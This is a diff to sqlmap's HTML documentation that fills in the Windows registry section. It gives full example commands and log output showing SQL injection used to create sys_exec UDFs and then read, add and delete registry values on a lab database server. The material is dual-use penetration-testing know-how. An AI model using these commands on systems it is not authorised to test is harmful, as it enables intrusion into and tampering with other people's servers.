zcoder
diff --git a/‎doc/README.html
Lines changed: 133 additions & 24 deletions b/‎doc/README.html
Lines changed: 133 additions & 24 deletions
diff --git a/‎doc/README.pdf
1.72 KB b/‎doc/README.pdf
1.72 KB
@@ -5345,54 +5345,163 @@ <H3>Database stored procedure heap-based buffer overflow exploit</H3>
 <H2><A NAME="ss5.11">5.11</A> <A HREF="#toc5.11">Windows registry access</A>
 </H2>
 
+<P>It is possible to access Windows registry when the back-end 
+database management system is either MySQL, PostgreSQL or 
+Microsoft SQL Server, and when the underlying database layer 
+supports stacked SQL queries. Also, session user has to have
+the needed privileges to access it.</P>
+
 <H3>Read a Windows registry key value</H3>
 
 <P>Option: <CODE>-</CODE><CODE>-reg-read</CODE></P>
 
-<P>TODO</P>
-
-
-<H3>Write a Windows registry key value data</H3>
-
-<P>Option: <CODE>-</CODE><CODE>-reg-add</CODE></P>
-
-<P>TODO</P>
-
+<P>Using this option you can read registry key values.</P>
 
-<H3>Delete a Windows registry key value</H3>
+<P>Example on a <B>PostgreSQL 8.4</B> target:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-read
 
-<P>Option: <CODE>-</CODE><CODE>-reg-del</CODE></P>
+[...]
+web server operating system: Windows
+web application technology: PHP 5.3.1, Apache 2.2.14
+back-end DBMS: PostgreSQL
 
-<P>TODO</P>
+[hh:mm:15] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:15] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:15] [INFO] retrieved: 8.4.2,
+[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:23] [INFO] retrieved: 1
+[hh:mm:23] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:23] [INFO] testing if current user is DBA
+[hh:mm:23] [INFO] retrieved: 1
+[hh:mm:23] [INFO] checking if UDF 'sys_eval' already exist
+[hh:mm:23] [INFO] retrieved: 0
+[hh:mm:24] [INFO] checking if UDF 'sys_exec' already exist
+[hh:mm:24] [INFO] retrieved: 0
+[hh:mm:25] [INFO] creating UDF 'sys_eval' from the binary UDF file
+[hh:mm:25] [INFO] creating UDF 'sys_exec' from the binary UDF file
+which registry key do you want to read? [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
+CurrentVersion]
+which registry key value do you want to read? [ProductName]
+[hh:mm:34] [INFO] reading Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
+Windows NT\CurrentVersion\ProductName'
+[hh:mm:35] [INFO] retrieved: ProductName        REG_SZ  Microsoft Windows XP
+Registry key value data:    'ProductName        REG_SZ  Microsoft Windows XP'
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
+
+<H3>Write a Windows registry key value</H3>
 
+<P>Option: <CODE>-</CODE><CODE>-reg-add</CODE></P>
 
-<H3>Windows registry key</H3>
+<P>Using this option you can write registry key values.</P>
 
-<P>Option: <CODE>-</CODE><CODE>-reg-key</CODE></P>
+<P>Example on a <B>PostgreSQL 8.4</B> target:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add
 
-<P>TODO</P>
+[...]
+web server operating system: Windows
+web application technology: PHP 5.3.1, Apache 2.2.14
+back-end DBMS: PostgreSQL
 
+[hh:mm:20] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:20] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:20] [INFO] retrieved: 8.4.2,
+[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:29] [INFO] retrieved: 1
+[hh:mm:30] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:30] [INFO] testing if current user is DBA
+[hh:mm:30] [INFO] retrieved: 1
+[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist
+[hh:mm:30] [INFO] retrieved: 0
+[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file
+which registry key do you want to write? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap
+which registry key value do you want to write? Test
+which registry key value data do you want to write? 1
+which registry key value data-type is it? [REG_SZ] REG_DWORD
+[hh:mm:41] [INFO] adding Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'
+with data '1'. This will work only if the user running the database process has privileges
+to modify the Windows registry.
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
 
-<H3>Windows registry key value</H3>
+<H3>Delete a Windows registry key</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-reg-value</CODE></P>
+<P>Option: <CODE>-</CODE><CODE>-reg-del</CODE></P>
 
-<P>TODO</P>
+<P>Using this option you can delete registry keys.</P>
 
+<P>Example on a <B>PostgreSQL 8.4</B> target:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-del
 
-<H3>Windows registry key value data</H3>
+[...]
+web server operating system: Windows
+web application technology: PHP 5.3.1, Apache 2.2.14
+back-end DBMS: PostgreSQL
 
-<P>Option: <CODE>-</CODE><CODE>-reg-data</CODE></P>
+[hh:mm:20] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:20] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:20] [INFO] retrieved: 8.4.2,
+[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:29] [INFO] retrieved: 1
+[hh:mm:30] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:30] [INFO] testing if current user is DBA
+[hh:mm:30] [INFO] retrieved: 1
+[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist
+[hh:mm:30] [INFO] retrieved: 0
+[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file
+which registry key do you want to delete? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap
+which registry key value do you want to delete? Test
+are you sure that you want to delete the Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\
+sqlmap\Test? [y/N] y
+[hh:mm:26] [INFO] deleting Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'. 
+This will work only if the user running the database process has privileges to modify the 
+Windows registry.
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
 
-<P>TODO</P>
 
+<H3>Auxiliary registry switches</H3>
 
-<H3>Windows registry key value type</H3>
+<P>Options: <CODE>-</CODE><CODE>-reg-key</CODE>, <CODE>-</CODE><CODE>-reg-value</CODE>, 
+<CODE>-</CODE><CODE>-reg-data</CODE> and <CODE>-</CODE><CODE>-reg-type</CODE></P>
 
-<P>Option: <CODE>-</CODE><CODE>-reg-type</CODE></P>
+<P>These switches can be used to provide data needed for proper running of
+options <CODE>-</CODE><CODE>-reg-read</CODE>, <CODE>-</CODE><CODE>-reg-add</CODE> and 
+<CODE>-</CODE><CODE>-reg-del</CODE>. So, instead of providing registry key
+information when asked, you can use them at command prompt as program
+arguments.</P>
 
-<P>TODO</P>
+<P>With <CODE>-</CODE><CODE>-reg-key</CODE> option you specify used windows 
+registry key path, with <CODE>-</CODE><CODE>-reg-value</CODE> value item
+name inside provided key, with <CODE>-</CODE><CODE>-reg-data</CODE> value 
+data, while with <CODE>-</CODE><CODE>-reg-type</CODE> option you specify
+type of the value item.</P>
 
+<P>So, another way of running example from option 
+<CODE>-</CODE><CODE>-reg-add</CODE> could be:</P>
+<P>
+<BLOCKQUOTE><CODE>
+<PRE>
+$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add \ 
+  --reg-key=HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap --reg-value=Test --reg-type=REG_SZ --reg-data=1
+</PRE>
+</CODE></BLOCKQUOTE>
+</P>
 
 <H2><A NAME="ss5.12">5.12</A> <A HREF="#toc5.12">Miscellaneous</A>
 </H2>